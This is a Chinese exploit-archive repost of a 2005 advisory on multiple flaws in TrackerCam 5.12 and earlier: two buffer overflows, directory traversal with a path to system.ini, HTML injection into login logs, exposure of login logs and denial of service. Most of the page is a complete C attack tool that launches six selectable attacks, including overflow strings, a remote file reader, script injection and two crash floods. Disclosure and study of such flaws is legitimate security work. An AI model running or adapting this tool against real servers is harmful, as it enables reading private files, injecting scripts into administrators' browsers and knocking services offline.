首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Multiple Vulnerabilities in TrackerCam
来源:aluigi.altervista.org 作者:Luigi 发布时间:2005-02-23  

Multiple Vulnerabilities in TrackerCam

Summary
"TrackerCam Software - A complete webcam solution with a unique color-tracking feature. Works without a TrackerPod too, if you don't need pan and tilt. TrackerCam Software is a free to download."

Multiple vulnerabilities in TrackerCam allows an attacker to run arbitrary code on a vulnerable machine, crash the server and gain access to sensitive information.

Credit:
The information has been provided by Luigi Auriemma.
The original article can be found at: http://aluigi.altervista.org/adv/tcambof-adv.txt

Details
Vulnerable Systems:
* TrackerCam Software version 5.12 and prior

Buffer Overflow in HTTP User-Agent Field:
An HTTP request containing an User-Agent field longer than 216 bytes leads to a buffer-overflow.

Buffer Overflow in PHP Argument:
Buffer-overflow happens when the server handles an argument longer than 256 bytes passed to any PHP script.
Example: http://victim_host:8090/any_request.php?aaaaaaaaaaaaaaaaaaaaaaaaa...

Directory Traversal and Full Path Disclosure:
TrackerCam has a PHP script accessible by anyone, that used to watch the log files from the web interface. Log filename passed through a PHP argument, there are no security checks in the script allowing the attacker to be able to choose what file to read and moreover from what location. Its possible to use a directory traversal attack. If the file doesn't exist or no arguments are passed, full physical path to ComGetLogFile.php3 script will be showed.

Example: http://victim_host:8090/tuner/ComGetLogFile.php3?fn=../../../../windows/system.ini
As can be seen from the example above slash, backslash and hex values are allowed.

HTML Injection in Log File:
Any login (correct or wrong) is logged in the current log file of the month. The log file is also visible through a web browser allowing an attacker to put HTML or any other code supported by the administrator's browser in the log file through a login request.

Information Disclosure:
Its possible to reach the ComGetLogFile.php3 script without any restriction. Log file, accessible via directory traversal, contains both wrong and correct logins, giving possibility to guess working passwords. IP addresses are stored in the same log file. Each log file contains the logins of the entire month.

Example of log filename for the current month is: http://host:8090/tuner/ComGetLogFile.php3?fn=Eye2005_02.log

Resource Exhaustion:
If the server receives a negative Content-Length, it will show a simple message box with an "insufficient memory" error, its happens for any subsequent bad request like that. After about 300 of these consecutive errors the server crashes.

Proof of concept:
The required winerr.h header can be found at: http://www.securiteam.com/unixfocus/5UP0I1FC0Y.html

/*
by Luigi Auriemma
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#define usleep sleep
#define TIMEZ 100
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>

#define TIMEZ 100000
#define ONESEC 1
#endif

#define VER "0.1"
#define PORT 8090
#define BUFFSZ 16384
#define REQDOS "GET / HTTP/1.0\r\n" \
"Content-Length: -1\r\n" \
"\r\n"
#define RETADDR "\xde\xc0\xad\xde"
#define UABOF "GET / HTTP/1.0\r\n" \
"User-Agent: " \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaa" RETADDR "\r\n" \
"\r\n"
#define PHPBOF "GET /MessageBoard/messages.php?" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaa" RETADDR " HTTP/1.0\r\n" \
"\r\n"
#define DIRTRAV "GET /tuner/ComGetLogFile.php3?fn="
#define XSS "GET /MessageBoard/messages.php?userID=unexistent&Group="
#define END " HTTP/1.0\r\n\r\n"
#define POSTDOS "GET / HTTP/1.0\r\n" \
"Content-Length: 2147483647\r\n" \
"\r\n"
#define BOOMSZ 10000000

#define ATTACK(x,y) sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); \
if(sd < 0) std_err();fputs("- connect\n", stdout); \
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) \
< 0) std_err(); \
fputs("- test attack\n", stdout); \
if(send(sd, x, y, 0) \
< 0) std_err();

u_long resolv(char *host);
void std_err(void);

int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
i,
len,
attack;
u_short port = PORT;
u_char buff[BUFFSZ + 1],
rotate[] = "|/-\\",
*xsstmp,
*p,
*s;


setbuf(stdout, NULL);

fputs("\n"
"TrackerCam <= 5.12 multiple vulnerabilities "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);

if(argc < 3) {
printf("\nUsage: %s <attack> <server> [port(%d)]\n"
"\n"
"Attack:\n"
" 1 = User-Agent buffer-overflow (return address 0x%08lx)\n"
" 2 = PHP argument buffer-overflow (return address 0x%08lx)\n"
" 3 = directory traversal and full path disclosure\n"
" 4 = html injection in log file\n"
" 5 = crash after about 300 multiple error messages\n"
" 6 = crash after sending about %d megabytes of data\n"
"\n", argv[0], port, *(u_long *)RETADDR, *(u_long *)RETADDR, BOOMSZ / 1000000);
exit(1);
}

#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

attack = atoi(argv[1]);
if((attack > 6) || (attack < 0)) {
fputs("\nError: you must choose a valid attack\n\n", stdout);
exit(1);
}

if(argc > 3) port = atoi(argv[3]);

peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;

printf("\n"
"- target %s : %hu\n"
"- attack %d\n",
inet_ntoa(peer.sin_addr), port,
attack);

if(attack == 1) {
ATTACK(UABOF, sizeof(UABOF) - 1);
close(sd);

} else if(attack == 2) {
ATTACK(PHPBOF, sizeof(PHPBOF) - 1);
close(sd);

} else if(attack == 3) {
fputs("- Enter the path of the remote file to read:\n"
" (like ..\\TrackerCam.pas or an unexistent file for path disclosure):\n"
" ", stdout);
strcpy(buff, DIRTRAV);
fflush(stdin);
fgets(buff + sizeof(DIRTRAV) - 1, BUFFSZ - sizeof(DIRTRAV) - sizeof(END), stdin);
len = strlen(buff) - 1;
strcpy(buff + len, END);
len += sizeof(END) - 1;
ATTACK(buff, len);
for(p = buff, i = BUFFSZ; i; p += len, i -= len) {
len = recv(sd, p, i, 0);
if(len <= 0) break;
}
close(sd);
fputc('\n', stdout);
fwrite(buff, p - buff, 1, stdout);
fputc('\n', stdout);
if(!i) printf("\n (reception truncated at %d bytes)\n", BUFFSZ);

} else if(attack == 4) {
fputs("- Enter the HTML/Javascript code you want to inject in the log file:\n ", stdout);
xsstmp = malloc(BUFFSZ + 1);
if(!xsstmp) std_err();
fflush(stdin);
fgets(xsstmp, BUFFSZ, stdin);

strcpy(buff, DIRTRAV);
for(p = buff + sizeof(DIRTRAV) - 1, s = xsstmp; *s > '\n'; p++, s++) {
if(*s == ' ') {
memcpy(p, "%20", 3);
p += 2;
} else {
*p = *s;
}
}
free(xsstmp);
strcpy(p, END);
len = (p + sizeof(END) - 1) - buff;
ATTACK(buff, len);
close(sd);

} else if(attack == 5) {
fputs("\nNumber of \"Content-Length: -1\" sent to the server:\n", stdout);
for(i = 0;; i++) {
printf("%8d\r", i);

sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) {
if(!i) std_err();
close(sd);
break;
}
if(send(sd, REQDOS, sizeof(REQDOS) - 1, 0)
< 0) std_err();

close(sd);
usleep(TIMEZ);
}

} else {
ATTACK(POSTDOS, sizeof(POSTDOS) - 1);

memset(buff, 'a', BUFFSZ);
fputs(
"- send data:\n"
" if the progress indicator doesn't move for long time, quit manually\n", stdout);
len = BOOMSZ / BUFFSZ;
for(i = 0; i < len; i++) {
if(send(sd, buff, BUFFSZ, 0)
< 0) std_err();
fputc(rotate[i & 3], stdout);
fputc('\b', stdout);
}
close(sd);
}

if((attack == 1) || (attack == 2)) {
fputs("- the return address of the server should have been overwritten but the server continue to run\n\n", stdout);
} else if(attack >= 5) {
fputs("- check if the server is really dead\n", stdout);
sleep(ONESEC);

sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) {
fputs("\n Server IS vulnerable!!!\n\n", stdout);
} else {
fputs("\n Server doesn't seem to be vulnerable\n\n", stdout);
}
close(sd);
} else {
fputs("\nFinished\n\n", stdout);
}

return(0);
}

u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;

host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolve hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)(hp->h_addr);
}
return(host_ip);
}

#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif

The original code with a compiled binary can be found at: http://aluigi.altervista.org/poc/tcambof.zip



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Knox Arkeia Server Backup Stac
·Arkeia Network Backup Client A
·Linux Vulnerability Allows Non
·Chat Anywhere Local Passwords
·Nullsoft SHOUTcast v1.9.4 remo
·eXeem Local Passwords Disclosu
·SHOUTcast DNAS/Linux v1.9.4 fo
·WWW File Share Pro Local Passw
·Arkeia Backup Client Remote Ac
·SendLink v1.5 Local Passwords
·Nullsoft SHOUTcast v1.9.4 remo
·PeerFTP v5 Local Passwords Dis
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved